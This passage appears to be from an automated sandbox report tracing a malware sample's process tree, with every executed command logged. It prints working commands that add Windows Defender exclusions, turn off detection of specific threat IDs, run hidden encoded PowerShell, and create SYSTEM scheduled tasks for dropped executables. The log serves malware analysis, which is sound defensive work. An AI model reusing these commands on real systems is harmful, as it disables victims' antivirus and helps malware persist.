/reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mrnDKDtAoCXFymVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\fIDQkgvqEeYuFUPy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\fIDQkgvqEeYuFUPy\" /t REG_DWORD /d 0 /reg:64;"3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:19344 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FAROrqqmwDJuC" /t REG_DWORD /d 0 /reg:324⤵PID:9616
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FAROrqqmwDJuC" /t REG_DWORD /d 0 /reg:325⤵PID:18956
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FAROrqqmwDJuC" /t REG_DWORD /d 0 /reg:644⤵PID:13180
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SZbnkDASJEUn" /t REG_DWORD /d 0 /reg:324⤵PID:13132
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SZbnkDASJEUn" /t REG_DWORD /d 0 /reg:644⤵PID:13292
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TdgVoScrU" /t REG_DWORD /d 0 /reg:324⤵PID:13032
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TdgVoScrU" /t REG_DWORD /d 0 /reg:644⤵
- Drops file in Windows directory
PID:12348 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR" /t REG_DWORD /d 0 /reg:324⤵PID:692
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR" /t REG_DWORD /d 0 /reg:644⤵PID:4964
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xmhVlMznYVRU2" /t REG_DWORD /d 0 /reg:324⤵PID:11440
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xmhVlMznYVRU2" /t REG_DWORD /d 0 /reg:644⤵PID:10384
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mrnDKDtAoCXFymVB /t REG_DWORD /d 0 /reg:324⤵PID:10408
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mrnDKDtAoCXFymVB /t REG_DWORD /d 0 /reg:644⤵PID:11396
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo /t REG_DWORD /d 0 /reg:324⤵PID:13388
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo /t REG_DWORD /d 0 /reg:644⤵PID:180
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\fIDQkgvqEeYuFUPy /t REG_DWORD /d 0 /reg:324⤵PID:8960
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\fIDQkgvqEeYuFUPy /t REG_DWORD /d 0 /reg:644⤵PID:13636
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gnDJSXBbE" /SC once /ST 09:03:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:13212 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gnDJSXBbE"3⤵PID:11372
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gnDJSXBbE"3⤵PID:16756
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wovemSUpOFDwVyMam" /SC once /ST 17:16:40 /RU "SYSTEM" /TR "\"C:\Windows\Temp\fIDQkgvqEeYuFUPy\ecFUPPvCYERMhrW\gCRvjRb.exe\" 4h /site_id 668658 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:16940 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "wovemSUpOFDwVyMam"3⤵PID:17028
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵PID:18880
-
C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\wwgpFMiovwBgRpD\CNvEnVd.exeC:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\wwgpFMiovwBgRpD\CNvEnVd.exe XY /site_id 668658 /S2⤵PID:15484
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵PID:15756
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:15432
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:15632
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:15796 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:16520
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:1392
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:15252
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Modifies data under HKEY_USERS
PID:15200 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:8284
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:17164
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:15692
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:17036 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵
- Blocklisted process makes network request
PID:7728 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:18372
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:18416
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:18552 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:18756
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:16928 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:17284
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:325⤵PID:17508
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:644⤵PID:17904
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:324⤵PID:17984
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:644⤵PID:16264
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:324⤵PID:17940
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:644⤵PID:18124
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:324⤵PID:18224
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:644⤵PID:6116
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:324⤵PID:12476
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:644⤵PID:11716
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:324⤵PID:18496
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:644⤵PID:18532
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:324⤵PID:18596
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:644⤵PID:18608
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:324⤵PID:19044
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:644⤵PID:11600
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:324⤵PID:17892
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:644⤵PID:4508
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:324⤵PID:13472
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:644⤵PID:10844
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:324⤵PID:19356
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:644⤵PID:18752
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:324⤵PID:8052
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:644⤵PID:18756
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "wovemSUpOFDwVyMam" /SC once /ST 00:26:44 /RU "SYSTEM" /TR "\"C:\Windows\Temp\fIDQkgvqEeYuFUPy\ecFUPPvCYERMhrW\USNydSz.exe\" 4h /site_id 668658 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:11936 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "wovemSUpOFDwVyMam"3⤵PID:18828
-
C:\Windows\Temp\fIDQkgvqEeYuFUPy\ecFUPPvCYERMhrW\gCRvjRb.exeC:\Windows\Temp\fIDQkgvqEeYuFUPy\ecFUPPvCYERMhrW\gCRvjRb.exe 4h /site_id 668658 /S2⤵
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
PID:17128 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵PID:17268
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:17568
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:16592
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:17624 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:18216
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:10420
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:17180
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:14656
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵PID:11456
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:18088
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:18576
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:18528
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
